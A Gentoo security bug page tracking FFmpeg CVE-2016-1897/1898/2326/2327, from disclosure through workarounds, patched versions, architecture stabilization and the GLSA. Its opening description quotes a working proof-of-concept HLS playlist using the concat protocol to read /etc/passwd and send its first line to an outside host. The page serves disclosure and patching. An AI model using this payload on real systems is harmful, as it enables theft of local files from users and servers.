Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 571868 - <media-video/ffmpeg-2.8.5: stealing local files with HLS+concat (CVE-2016-{1897,1898,2326,2327})
Summary: <media-video/ffmpeg-2.8.5: stealing local files with HLS+concat (CVE-2016-{18...
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: A4 [glsa]
Keywords:
: 565684 572050 572244 (view as bug list)
Depends on: 565684 570878
Blocks:
  Show dependency tree
 
Reported: 2016-01-14 10:17 UTC by Agostino Sarubbo
Modified: 2016-06-19 00:01 UTC (History)
8 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2016-01-14 10:17:26 UTC
From ${URL} :

Hello!
I found some strange behavior in ffmpeg which can lead to stealing local
files during ffmpeg/ffprobe exec, it's also applied to libav.

I've underestimated the impact of this bug, so it was full disclosured
in this article (Russian language, but google translate works fine with
it) - http://habrahabr.ru/company/mailru/blog/274855


In short:
if linux user download specially prepared video file (with any
extension: avi/mov/etc..) which contains HLS m3u8 playlist with "concat"
protocol in url:,
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

header.m3u8:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://example.org?

If user launches ffmpeg-based video player (MPlayer, etc..), first line
of /etc/passwd will be sent to http://example.org? in
http://example.org?# $FreeBSD: release/100.0/et..  request.
The same happens when file manager tries to generate thumbnail for this
file.

All this can be applied to server-run ffmpeg during video conversion.
FFmpeg/libav security teams are already notified, but official patches
are not available yet, so you can rebuild ffmpeg with --disable-network
configure option which prevents this vulnerability from being exploited.

Moreover, it's always recommended to run ffmpeg in isolated environment
when processing untrusted files
(googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html)



@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Comment 1 Shiba 2016-01-14 12:26:16 UTC
Archlinux rebuilt ffmpeg only with

--disable-demuxer='hls' --disable-protocol='concat,hls'

to workaround this bug, without disabling network capabilities in general.
Comment 3 Brian Evans (RETIRED) gentoo-dev 2016-01-16 01:47:09 UTC
*** Bug 572050 has been marked as a duplicate of this bug. ***
Comment 4 Alexis Ballier gentoo-dev 2016-01-16 09:36:02 UTC
from: http://ffmpeg.org/security.html

2.8.5
Fixes following vulnerabilities:

CVE-2016-1897,CVE-2016-1898, 23b903aaf4eefb1ce1396a32525c8e5501d5cec8 / 6ba42b6482c725a59eb468391544dc0c75b8c6f0
CVE-2016-1897,CVE-2016-1898, b7d54d6e072690a62d5ea5ade66ffce6944a5ff4 / 7145e80b4f78cff5ed5fee04d4c4d53daaa0e077
CVE-2016-1897,CVE-2016-1898, 28f89bc439be1de9a61ac404ce79f9bc4cac5ec8 / cfda1bea4c18ec1edbc11ecc465f788b02851488


so, 2.8.5 should fix it.

stabilization process was started in bug #565684, but you can cc arches here if you prefer
Comment 5 Mike Limansky 2016-01-17 08:39:58 UTC
According to this http://ffmpeg.org/index.html#news,  2.7.5, 2.6.7 and 2.5.10 are also contains fix for these vulnerabilities. So 2.6.7 can go stable (since 2.6 is current stable branch in Gentoo).
Comment 6 nE0sIghT 2016-01-18 13:07:16 UTC
*** Bug 572244 has been marked as a duplicate of this bug. ***
Comment 7 Mike Limansky 2016-01-18 19:30:34 UTC
I've checked ffmpeg-2.6.7 emerged successfully with renamed ffmpeg-2.6.4.ebuild.
Comment 8 Alexis Ballier gentoo-dev 2016-01-24 14:37:35 UTC
well, since sec team seems busy, ccing arches here

@arch teams: target is =media-video/ffmpeg-2.8.5

you'll likely need x265 (bug #570878)
Comment 9 Agostino Sarubbo gentoo-dev 2016-01-25 10:57:26 UTC
amd64 stable
Comment 10 Agostino Sarubbo gentoo-dev 2016-01-25 10:57:58 UTC
x86 stable
Comment 11 Jeroen Roovers (RETIRED) gentoo-dev 2016-01-27 15:08:05 UTC
Stable for HPPA PPC64.
Comment 12 Tobias Klausmann (RETIRED) gentoo-dev 2016-01-30 17:43:36 UTC
Stable on alpha, took app-arch/snappy along.
Comment 13 Pacho Ramos gentoo-dev 2016-01-31 16:54:33 UTC
*** Bug 565684 has been marked as a duplicate of this bug. ***
Comment 14 Markus Meier gentoo-dev 2016-02-03 20:42:56 UTC
arm stable
Comment 15 GLSAMaker/CVETool Bot gentoo-dev 2016-03-15 09:40:56 UTC
CVE-2016-2327 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2327):
  libavcodec/pngenc.c in FFmpeg before 2.8.5 uses incorrect line sizes in
  certain row calculations, which allows remote attackers to cause a denial of
  service (out-of-bounds array access) or possibly have unspecified other
  impact via a crafted .avi file, related to the apng_encode_frame and
  encode_apng functions.

CVE-2016-2326 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2326):
  Integer overflow in the asf_write_packet function in libavformat/asfenc.c in
  FFmpeg before 2.8.5 allows remote attackers to cause a denial of service or
  possibly have unspecified other impact via a crafted PTS (aka presentation
  timestamp) value in a .mov file.
Comment 16 GLSAMaker/CVETool Bot gentoo-dev 2016-03-15 09:41:30 UTC
CVE-2016-1898 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1898):
  FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read
  arbitrary files by using the subfile protocol in an HTTP Live Streaming
  (HLS) M3U8 file, leading to an external HTTP request in which the URL string
  contains an arbitrary line of a local file.

CVE-2016-1897 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1897):
  FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read
  arbitrary files by using the concat protocol in an HTTP Live Streaming (HLS)
  M3U8 file, leading to an external HTTP request in which the URL string
  contains the first line of a local file.
Comment 17 Agostino Sarubbo gentoo-dev 2016-03-16 14:11:08 UTC
ppc stable
Comment 18 Agostino Sarubbo gentoo-dev 2016-03-19 11:37:57 UTC
sparc stable
Comment 19 Agostino Sarubbo gentoo-dev 2016-03-20 12:01:58 UTC
ia64 stable.

Maintainer(s), please cleanup.
Security, please vote.
Comment 20 Aaron Bauman (RETIRED) gentoo-dev 2016-03-20 12:21:31 UTC
Added to existing GLSA.
Comment 21 GLSAMaker/CVETool Bot gentoo-dev 2016-06-19 00:01:18 UTC
This issue was resolved and addressed in
 GLSA 201606-09 at https://security.gentoo.org/glsa/201606-09
by GLSA coordinator Kristian Fiskerstrand (K_F).